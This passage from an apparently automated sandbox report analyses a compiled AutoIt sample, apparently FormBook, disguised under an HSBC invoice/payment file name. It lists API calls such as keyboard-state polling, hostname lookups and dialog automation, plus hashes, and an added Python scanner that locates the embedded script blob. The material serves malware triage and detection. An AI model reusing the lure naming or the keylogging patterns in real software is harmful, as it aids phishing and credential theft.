                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 75fc0036450c1ad5efbde682a4da1ddb7fff563047ebf0eeb563c3397ec5860b
                    • Instruction ID: 1e098d1257753c0d52bc39760599b1aa74e48b95daddb3aa781e0b70df4139c8
                    • Opcode Fuzzy Hash: 75fc0036450c1ad5efbde682a4da1ddb7fff563047ebf0eeb563c3397ec5860b
                    • Instruction Fuzzy Hash: 43028C711083419FC724EF24C881AAFBBE5AF99354F14691DF4CEA72A1DB30DA49DB42
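The strings in this block (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", the "#include depth exceeded", "Bad directive syntax error" and "Unterminated string" messages) are the AutoIt3 runtime's script-loader strings, which is what the "Binary is likely a compiled AutoIt script file" signature rests on: the native code is the stock interpreter stub, and the FormBook behaviour comes from the embedded script. The useful first triage step is therefore to confirm the script blob is present and where it sits in the file (resource section or overlay, depending on the AutoIt version) so it can be carved and decompiled instead of reversing the stub. The Python below is an added example, not part of the report or of the sample; it assumes the loader compares "AU3!" and "EA06" as one contiguous "AU3!EA06" tag (as compiled scripts carry it) and searches both ASCII and UTF-16LE encodings. build_constructed_sample() fabricates a tiny stand-in PE purely for testing; it is not the analysed binary.

```python
"""Locate a compiled AutoIt3 script blob inside a PE image (added example)."""
import struct

# Loader strings from the report; "AU3!" + "EA06" form one tag in compiled scripts.
MARKERS = (b">>>AUTOIT SCRIPT<<<", b"AU3!EA06")


def pe_sections(data):
    """Return [(name, raw_offset, raw_size)] from the section table, [] if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    try:
        pe_off = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe_off:pe_off + 4] != b"PE\0\0":
            return []
        nsections = struct.unpack_from("<H", data, pe_off + 6)[0]
        opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
        table = pe_off + 24 + opt_size                # first IMAGE_SECTION_HEADER
        sections = []
        for i in range(nsections):
            name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
                "<8sIIII", data, table + 40 * i)
            sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size))
        return sections
    except struct.error:                              # truncated or malformed header
        return []


def locate(offset, sections):
    """Name the section holding a file offset, or 'overlay' if it lies past the last one."""
    if not sections:
        return "not a PE"
    for name, start, size in sections:
        if start <= offset < start + size:
            return name
    end = max(start + size for _, start, size in sections)
    return "overlay" if offset >= end else "headers"


def scan(data):
    """Find every marker hit (ASCII and UTF-16LE) with its file offset and location."""
    sections = pe_sections(data)
    hits = []
    for marker in MARKERS:
        text = marker.decode("ascii")
        for encoding, needle in (("ascii", marker), ("utf-16le", text.encode("utf-16-le"))):
            pos = data.find(needle)
            while pos != -1:
                hits.append({"marker": text, "encoding": encoding,
                             "offset": pos, "location": locate(pos, sections)})
                pos = data.find(needle, pos + 1)
    return hits


def is_compiled_autoit(data):
    """The AU3!EA06 tag alone is enough to say a script blob is embedded."""
    return any(h["marker"] == "AU3!EA06" for h in scan(data))


def build_constructed_sample():
    """Constructed stand-in PE (not the real sample): one .text section of 0x200
    bytes at file offset 0x200, followed by an overlay carrying both markers."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew -> PE header at 0x40
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 1, 0, 0, 0, 0, 0x102)  # no optional header
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)
    header = bytes(dos) + coff + section
    header += b"\0" * (0x200 - len(header))
    text = b"\x90" * 0x200
    overlay = b"\0" * 16 + b"AU3!EA06" + b"\0" * 8 + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le")
    return header + text + overlay


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    for hit in scan(blob):
        print(f"{hit['marker']!r:24} {hit['encoding']:8} offset=0x{hit['offset']:x} in {hit['location']}")
```

Run it against the real file as `python scan_au3.py sample.exe`; a hit in ".rsrc" means the script is a resource to extract, a hit in "overlay" means it was appended after the last section and can be carved from that offset.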
                    APIs
                    • _memset.LIBCMT ref: 00E845F9
                    • GetMenuItemCount.USER32(00F46890), ref: 00EBD7CD
                    • GetMenuItemCount.USER32(00F46890), ref: 00EBD87D
                    • GetCursorPos.USER32(?), ref: 00EBD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 00EBD8CA
                    • TrackPopupMenuEx.USER32(00F46890,00000000,?,00000000,00000000,00000000), ref: 00EBD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EBD8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                    • Instruction ID: 059d87070c489a07f1e652c6c18a15c362cbc9280f8329e241c701844e0d531e
                    • Opcode Fuzzy Hash: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                    • Instruction Fuzzy Hash: 4B71E57060421ABEEB319F15DC45FEABF69FF05368F241216F618B61E0DBB15810EB94
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                    • Instruction ID: 85924ce4f3aed570a893fb6e10a228deb4a364f2635edc88d7be56b56058cd7c
                    • Opcode Fuzzy Hash: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                    • Instruction Fuzzy Hash: 8E417C7154024E8BDF14EF90DCA1AEA37A5BF2A320F104454FD956B292DB30A91AEB60
                    APIs
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                      • Part of subcall function 00E87A84: _memmove.LIBCMT ref: 00E87B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EE55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EE55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EE55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EE560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EE561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
                    • Instruction ID: 985e436b34019d2e24a5f752bb65714130bb6cd405a1dfdf20efda7e7ac85b18
                    • Opcode Fuzzy Hash: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
                    • Instruction Fuzzy Hash: A311E22155016D79D720B663CC8ACFF7BBCEF91F14F501469B448B20D1EE618D05CAA2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 1cd24f9b2fea91dfd8b5a8d2772161243729b2654f6b494bf7ecd1c0db75a035
                    • Instruction ID: c81419d2cb6ed62ae2a80404059c431a4c2d9cd590fbc0ac4f07fb245673c314
                    • Opcode Fuzzy Hash: 1cd24f9b2fea91dfd8b5a8d2772161243729b2654f6b494bf7ecd1c0db75a035
                    • Instruction Fuzzy Hash: 5C11057190411DAFCB20EB259C46EDB77ECAB85710F0011B6F504B6092EFB19A85A662
                    APIs
                    • timeGetTime.WINMM ref: 00EE521C
                      • Part of subcall function 00EA0719: timeGetTime.WINMM(?,7608B400,00E90FF9), ref: 00EA071D
                    • Sleep.KERNEL32(0000000A), ref: 00EE5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00EE526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EE528E
                    • SetActiveWindow.USER32 ref: 00EE52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EE52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EE52DA
                    • Sleep.KERNEL32(000000FA), ref: 00EE52E5
                    • IsWindow.USER32 ref: 00EE52F1
                    • EndDialog.USER32(00000000), ref: 00EE5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                    • Instruction ID: 1fe378077799d971ee8f4c6046e09f4d6757b4ab406bd1aef1b664c8b27b41da
                    • Opcode Fuzzy Hash: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                    • Instruction Fuzzy Hash: BA21F67510474CAFE7106F31EC89B263B69FB2A34EF082424F901E65B5DBB19D04BB62
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00EE05A7
                    • SetKeyboardState.USER32(?), ref: 00EE0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 00EE0632
                    • GetKeyState.USER32(000000A0), ref: 00EE0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 00EE0678
                    • GetKeyState.USER32(000000A1), ref: 00EE0689
                    • GetAsyncKeyState.USER32(00000011), ref: 00EE06B5
                    • GetKeyState.USER32(00000011), ref: 00EE06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 00EE06EC
                    • GetKeyState.USER32(00000012), ref: 00EE06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00EE0723
                    • GetKeyState.USER32(0000005B), ref: 00EE0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                    • Instruction ID: d75c2f16423d8d058da6caee4b25bd4691dc1c0452bf4e7d88e7865184d3ed30
                    • Opcode Fuzzy Hash: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                    • Instruction Fuzzy Hash: A251D970A047CC19FB35EBA188547EABFF49F01384F08559A95C2765C2DAE49BCCCB61
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00EDC746
                    • GetWindowRect.USER32(00000000,?), ref: 00EDC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EDC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 00EDC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 00EDC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EDC827
                    • GetDlgItem.USER32(?,000003E9), ref: 00EDC835
                    • GetWindowRect.USER32(00000000,?), ref: 00EDC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EDC889
                    • GetDlgItem.USER32(?,000003EA), ref: 00EDC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EDC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                    • Instruction ID: 014e750beb16fe409623332eef42b35b069d5f770033ccc041f59de917ffe095
                    • Opcode Fuzzy Hash: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                    • Instruction Fuzzy Hash: 3B514275B00209AFDB18CF68DD85AAEBBBAFB88310F14812DF515E7290D770AD05DB10
                    APIs
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • GetSysColor.USER32(0000000F), ref: 00E821D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                    • Instruction ID: bf2ab0ecd9e385a8fe99921a9f3fb135e8a77d3d95539fa78d77bfbf459665aa
                    • Opcode Fuzzy Hash: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                    • Instruction Fuzzy Hash: 4141A331104144AFDB256F68EC48BB93B65FB06335F285269FE6DAA1F2C7318C42EB51
                    APIs
                    • CharLowerBuffW.USER32(?,?,00F0F910), ref: 00EEAB76
                    • GetDriveTypeW.KERNEL32(00000061,00F3A620,00000061), ref: 00EEAC40
                    • _wcscpy.LIBCMT ref: 00EEAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                    • Instruction ID: cbe5dbe95e006a68367ddd03723550236ecf9a23ad4d3d3d808e480bbeadb0d4
                    • Opcode Fuzzy Hash: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                    • Instruction Fuzzy Hash: BD51AF311083459BC714EF15C881AAAB7E5EF85314F18682DF49ABB2A2DB31ED49CB53
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: b6c61f80134e4b05464f1082298680adae0be056eac29949300943f73428451b
                    • Instruction ID: f84bb826110476b03327f31be0779ef63cf84629bd4c647fbd30b0d0add98501
                    • Opcode Fuzzy Hash: b6c61f80134e4b05464f1082298680adae0be056eac29949300943f73428451b
                    • Instruction Fuzzy Hash: 01411631A04205AEDB24EB78DC41EB773E8EF89314F2454AEF54DF6292EA71E8418711
                    APIs
                    • _memset.LIBCMT ref: 00F073D9
                    • CreateMenu.USER32 ref: 00F073F4
                    • SetMenu.USER32(?,00000000), ref: 00F07403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F07490
                    • IsMenu.USER32(?), ref: 00F074A6
                    • CreatePopupMenu.USER32 ref: 00F074B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F074DD
                    • DrawMenuBar.USER32 ref: 00F074E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                    • Instruction ID: 569c6818aea54fe8a2241d5dfe664687c935887ab4f9115c5020e9632e9968d7
                    • Opcode Fuzzy Hash: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                    • Instruction Fuzzy Hash: 91413879A00349EFDB20EF64D884AAABBF5FF49310F144069FD55A73A0D731A924EB50
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F077CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 00F077D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F077E7
                    • SelectObject.GDI32(00000000,00000000), ref: 00F077EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F077FA
                    • DeleteDC.GDI32(00000000), ref: 00F07803
                    • GetWindowLongW.USER32(?,000000EC), ref: 00F0780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F07821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F0782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: cf47acd65c46415072a79650a89a69e499f0b0fbbb885affd3ef324257e896e4
